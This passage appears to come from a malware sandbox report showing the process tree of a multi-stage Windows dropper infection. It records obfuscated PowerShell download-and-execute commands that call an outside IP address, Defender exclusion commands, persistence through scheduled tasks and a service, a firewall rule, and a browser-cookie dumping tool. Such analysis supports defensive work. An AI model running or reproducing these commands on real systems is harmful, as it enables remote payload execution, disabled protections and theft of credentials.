C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 792
3⤵
- Program crash
PID:1172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 880
3⤵
- Program crash
PID:2076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 668
3⤵
- Program crash
PID:3040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 848
3⤵
- Program crash
PID:3252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 860
3⤵
- Program crash
PID:4156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 852
3⤵
- Program crash
PID:3104

C:\Users\Admin\AppData\Local\Temp\Info.exe
"C:\Users\Admin\AppData\Local\Temp\Info.exe"
3⤵
- Executes dropped EXE
PID:5084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 636
4⤵
- Program crash
PID:6644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 636
4⤵
- Program crash
PID:5724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 636
4⤵
- Program crash
PID:6464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 700
4⤵
- Program crash
PID:1500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 708
4⤵
- Program crash
PID:3572

C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
"C:\Users\Admin\AppData\Local\Temp\Updbdate.exe"
2⤵
- Executes dropped EXE
PID:5008

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3320

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:3024

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4356

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3932

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:992

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4600

C:\Users\Admin\AppData\Local\Temp\pub2.exe
"C:\Users\Admin\AppData\Local\Temp\pub2.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2280

C:\Users\Admin\AppData\Local\Temp\File.exe
"C:\Users\Admin\AppData\Local\Temp\File.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
PID:4904

C:\Users\Admin\Pictures\Adobe Films\QfCggr3jPU6jnzBJQpaByqyD.exe
"C:\Users\Admin\Pictures\Adobe Films\QfCggr3jPU6jnzBJQpaByqyD.exe"
3⤵
- Executes dropped EXE
PID:2928

C:\Users\Admin\Pictures\Adobe Films\AknDyySPWKfRlNvB7xWkiS92.exe
"C:\Users\Admin\Pictures\Adobe Films\AknDyySPWKfRlNvB7xWkiS92.exe"
3⤵
- Executes dropped EXE
PID:312

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\AknDyySPWKfRlNvB7xWkiS92.exe" -Force
4⤵
PID:6820

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension "exe" -Force
4⤵
PID:6856

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\AknDyySPWKfRlNvB7xWkiS92.exe" -Force
4⤵
PID:7012

C:\Users\Admin\Pictures\Adobe Films\AknDyySPWKfRlNvB7xWkiS92.exe
"C:\Users\Admin\Pictures\Adobe Films\AknDyySPWKfRlNvB7xWkiS92.exe"
4⤵
PID:4220

C:\Users\Admin\Pictures\Adobe Films\AknDyySPWKfRlNvB7xWkiS92.exe
"C:\Users\Admin\Pictures\Adobe Films\AknDyySPWKfRlNvB7xWkiS92.exe"
4⤵
PID:3980

C:\Users\Admin\Pictures\Adobe Films\_iWBenfy50y_rzwGAZ0emopl.exe
"C:\Users\Admin\Pictures\Adobe Films\_iWBenfy50y_rzwGAZ0emopl.exe"
3⤵
- Executes dropped EXE
PID:3108

C:\Users\Admin\Pictures\Adobe Films\2e1UWhMqbyMyDgr_blyZ2Up0.exe
"C:\Users\Admin\Pictures\Adobe Films\2e1UWhMqbyMyDgr_blyZ2Up0.exe"
3⤵
- Executes dropped EXE
PID:3480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3480 -s 464
4⤵
- Program crash
PID:5240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3480 -s 504
4⤵
- Program crash
PID:4224

C:\Users\Admin\Pictures\Adobe Films\UtKAHgLnObtMTFMPnTwtLNM7.exe
"C:\Users\Admin\Pictures\Adobe Films\UtKAHgLnObtMTFMPnTwtLNM7.exe"
3⤵
PID:4304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4304 -s 624
4⤵
- Program crash
PID:5820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4304 -s 664
4⤵
- Program crash
PID:6512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4304 -s 664
4⤵
- Program crash
PID:6872

C:\Users\Admin\Pictures\Adobe Films\EuoKWYY78UF6sZvKnoe4eno6.exe
"C:\Users\Admin\Pictures\Adobe Films\EuoKWYY78UF6sZvKnoe4eno6.exe"
3⤵
PID:4356

C:\Users\Admin\Documents\0ekleFlpHrxmH8xnSOFum4hM.exe
"C:\Users\Admin\Documents\0ekleFlpHrxmH8xnSOFum4hM.exe"
4⤵
PID:5384

C:\Users\Admin\Pictures\Adobe Films\N06vliItvLOZNmsLMCRCkyVE.exe
"C:\Users\Admin\Pictures\Adobe Films\N06vliItvLOZNmsLMCRCkyVE.exe"
5⤵
PID:4356

C:\Users\Admin\Pictures\Adobe Films\zHLNEX5U0gTTJO9RawVHMPQK.exe
"C:\Users\Admin\Pictures\Adobe Films\zHLNEX5U0gTTJO9RawVHMPQK.exe"
5⤵
PID:7072

C:\Users\Admin\AppData\Local\Temp\7zS3DF7.tmp\Install.exe
.\Install.exe
6⤵
PID:5796

C:\Users\Admin\Pictures\Adobe Films\H4GDUk49DQp4KlpkZ3Tj8Iii.exe
"C:\Users\Admin\Pictures\Adobe Films\H4GDUk49DQp4KlpkZ3Tj8Iii.exe"
5⤵
PID:6256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6256 -s 616
6⤵
- Program crash
PID:5740

C:\Users\Admin\Pictures\Adobe Films\PZNwLhUyrKoOoBp_HbNU2D1E.exe
"C:\Users\Admin\Pictures\Adobe Films\PZNwLhUyrKoOoBp_HbNU2D1E.exe"
5⤵
PID:6288

C:\Users\Admin\Pictures\Adobe Films\VgNxEQthtTRKchIEEEoUn5uw.exe
"C:\Users\Admin\Pictures\Adobe Films\VgNxEQthtTRKchIEEEoUn5uw.exe"
5⤵
PID:3788

C:\Users\Admin\Pictures\Adobe Films\4hI4oaR6jmakRTzBV0Eed0ZU.exe
"C:\Users\Admin\Pictures\Adobe Films\4hI4oaR6jmakRTzBV0Eed0ZU.exe"
5⤵
PID:5592

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:5284

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:5544

C:\Users\Admin\Pictures\Adobe Films\igQUkjiwIvHw9vICd10JbBjW.exe
"C:\Users\Admin\Pictures\Adobe Films\igQUkjiwIvHw9vICd10JbBjW.exe"
3⤵
PID:3976

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
4⤵
PID:5292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 976
4⤵
- Program crash
PID:5484

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
4⤵
PID:6540

C:\Users\Admin\Pictures\Adobe Films\t6h7d7peM3frs9Yq4pSzkhSn.exe
"C:\Users\Admin\Pictures\Adobe Films\t6h7d7peM3frs9Yq4pSzkhSn.exe"
3⤵
PID:4576

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
4⤵
PID:5420

C:\Windows\SysWOW64\cmd.exe
cmd
5⤵
PID:6128

C:\Users\Admin\Pictures\Adobe Films\1KRlDsROQBnPEVz85G1xU6nU.exe
"C:\Users\Admin\Pictures\Adobe Films\1KRlDsROQBnPEVz85G1xU6nU.exe"
3⤵
PID:1440

C:\Users\Admin\Pictures\Adobe Films\hCBdWcL92S6RV8genjuETijf.exe
"C:\Users\Admin\Pictures\Adobe Films\hCBdWcL92S6RV8genjuETijf.exe"
3⤵
PID:4228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 952
4⤵
- Program crash
PID:6700

C:\Users\Admin\Pictures\Adobe Films\43N3aCXTI8KMgvkNoISY3y5S.exe
"C:\Users\Admin\Pictures\Adobe Films\43N3aCXTI8KMgvkNoISY3y5S.exe"
3⤵
PID:3308

C:\Users\Admin\Pictures\Adobe Films\kBw4SlvX7mQCqk6snBaXCJWO.exe
"C:\Users\Admin\Pictures\Adobe Films\kBw4SlvX7mQCqk6snBaXCJWO.exe"
3⤵
PID:2076

C:\Users\Admin\AppData\Local\Temp\d0eece7a-e60a-40a0-848c-712f4284d02d.exe
"C:\Users\Admin\AppData\Local\Temp\d0eece7a-e60a-40a0-848c-712f4284d02d.exe"
4⤵
PID:3536

C:\Users\Admin\Pictures\Adobe Films\l4t3Vtx643Lx4fpdmLss1hAE.exe
"C:\Users\Admin\Pictures\Adobe Films\l4t3Vtx643Lx4fpdmLss1hAE.exe"
3⤵
PID:3396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3396 -s 456
4⤵
- Program crash
PID:5808

C:\Users\Admin\Pictures\Adobe Films\hUTdmx27HiJbCRxdOKtyjYLg.exe
"C:\Users\Admin\Pictures\Adobe Films\hUTdmx27HiJbCRxdOKtyjYLg.exe"
3⤵
PID:800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 800 -s 460
4⤵
- Program crash
PID:5740

C:\Users\Admin\Pictures\Adobe Films\AnCBoez3619Lu3fZLVBGSqST.exe
"C:\Users\Admin\Pictures\Adobe Films\AnCBoez3619Lu3fZLVBGSqST.exe"
3⤵
PID:3212

C:\Users\Admin\Pictures\Adobe Films\D3HTg09424Dx3dhLW38ctuLG.exe
"C:\Users\Admin\Pictures\Adobe Films\D3HTg09424Dx3dhLW38ctuLG.exe"
3⤵
PID:5272

C:\Users\Admin\Pictures\Adobe Films\WzfKANmVb4JA2ZnbFapUzi1t.exe
"C:\Users\Admin\Pictures\Adobe Films\WzfKANmVb4JA2ZnbFapUzi1t.exe"
3⤵
PID:5328

C:\Users\Admin\AppData\Local\Temp\7zS8AC4.tmp\Install.exe
.\Install.exe
4⤵
PID:6104

C:\Users\Admin\AppData\Local\Temp\7zSD8D4.tmp\Install.exe
.\Install.exe /S /site_id "525403"
5⤵
PID:6596

C:\Users\Admin\Pictures\Adobe Films\BjhLeo_S66WGW7TnoQ9ISkld.exe
"C:\Users\Admin\Pictures\Adobe Films\BjhLeo_S66WGW7TnoQ9ISkld.exe"
3⤵
PID:5360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\123\main.bat" /s"
4⤵
PID:6792

C:\Windows\system32\mode.com
mode 65,10
5⤵
PID:5136

C:\Users\Admin\Pictures\Adobe Films\AWlFGWcrffkzt7mjSNwpj5WQ.exe
"C:\Users\Admin\Pictures\Adobe Films\AWlFGWcrffkzt7mjSNwpj5WQ.exe"
3⤵
PID:5288

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/SkyDrive.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:5868

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/Fax.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:5936

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:6056

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/Offer/Offer.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:6140

C:\Users\Admin\Pictures\Adobe Films\ojIdonLnyacSanPLf9OCWv1J.exe
"C:\Users\Admin\Pictures\Adobe Films\ojIdonLnyacSanPLf9OCWv1J.exe"
3⤵
PID:5280

C:\Users\Admin\Pictures\Adobe Films\ojIdonLnyacSanPLf9OCWv1J.exe
"C:\Users\Admin\Pictures\Adobe Films\ojIdonLnyacSanPLf9OCWv1J.exe"
4⤵
PID:4464

C:\Users\Admin\Pictures\Adobe Films\ECFLjDHfTxRtmQqOr28Xn1Rv.exe
"C:\Users\Admin\Pictures\Adobe Films\ECFLjDHfTxRtmQqOr28Xn1Rv.exe"
3⤵
PID:5224

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\psrwttfe\
4⤵
PID:3088

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\cfvunpwz.exe" C:\Windows\SysWOW64\psrwttfe\
4⤵
PID:2432

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create psrwttfe binPath= "C:\Windows\SysWOW64\psrwttfe\cfvunpwz.exe /d\"C:\Users\Admin\Pictures\Adobe Films\ECFLjDHfTxRtmQqOr28Xn1Rv.exe\"" type= own start= auto DisplayName= "wifi support"
4⤵
PID:5524

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description psrwttfe "wifi internet conection"
4⤵
PID:6352

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start psrwttfe
4⤵
PID:6444

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
4⤵
PID:6552

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1rPS67
2⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4272

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9a32146f8,0x7ff9a3214708,0x7ff9a3214718
3⤵
PID:1716

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,18133335958762465109,10900125663906769738,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2020 /prefetch:2
3⤵
PID:3556

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,18133335958762465109,10900125663906769738,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2508 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3984

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2064,18133335958762465109,10900125663906769738,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2040 /prefetch:8
3⤵
PID:3964

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,18133335958762465109,10900125663906769738,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3696 /prefetch:1
3⤵
PID:512

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,18133335958762465109,10900125663906769738,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3712 /prefetch:1
3⤵
PID:4400

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,18133335958762465109,10900125663906769738,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:1
3⤵
PID:4512

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,18133335958762465109,10900125663906769738,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5040 /prefetch:1
3⤵
PID:1792

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,18133335958762465109,10900125663906769738,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6100 /prefetch:2
3⤵
PID:4800

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,18133335958762465109,10900125663906769738,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5580 /prefetch:8
3⤵
PID:5560

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
3⤵
PID:2800

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff68d3e5460,0x7ff68d3e5470,0x7ff68d3e5480
4⤵
PID:1464

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1688

C:\Windows\SysWOW64\rundll32.exe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
2⤵
- Loads dropped DLL
PID:3308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 604
3⤵
- Program crash
PID:5000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 192 -p 3308 -ip 3308
1⤵
PID:4332

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2664 -ip 2664
1⤵
PID:4572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2664 -ip 2664
1⤵
PID:616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2664 -ip 2664
1⤵
PID:4232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2664 -ip 2664
1⤵
PID:2692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2664 -ip 2664
1⤵
PID:4872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2664 -ip 2664
1⤵
PID:3004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2664 -ip 2664
1⤵
PID:3104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2664 -ip 2664
1⤵
PID:4660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2664 -ip 2664
1⤵
PID:4032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2664 -ip 2664
1⤵
PID:3668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2664 -ip 2664
1⤵
PID:4760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2664 -ip 2664
1⤵
PID:4944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2664 -ip 2664
1⤵
PID:3452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2664 -ip 2664
1⤵
PID:1560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2664 -ip 2664
1⤵
PID:1728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2664 -ip 2664
1⤵
PID:5104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2664 -ip 2664
1⤵
PID:4228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2664 -ip 2664
1⤵
PID:1900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2664 -ip 2664
1⤵
PID:1512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2664 -ip 2664
1⤵
PID:2372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2664 -ip 2664
1⤵
PID:4088

C:\Windows\system32\svchost.exe
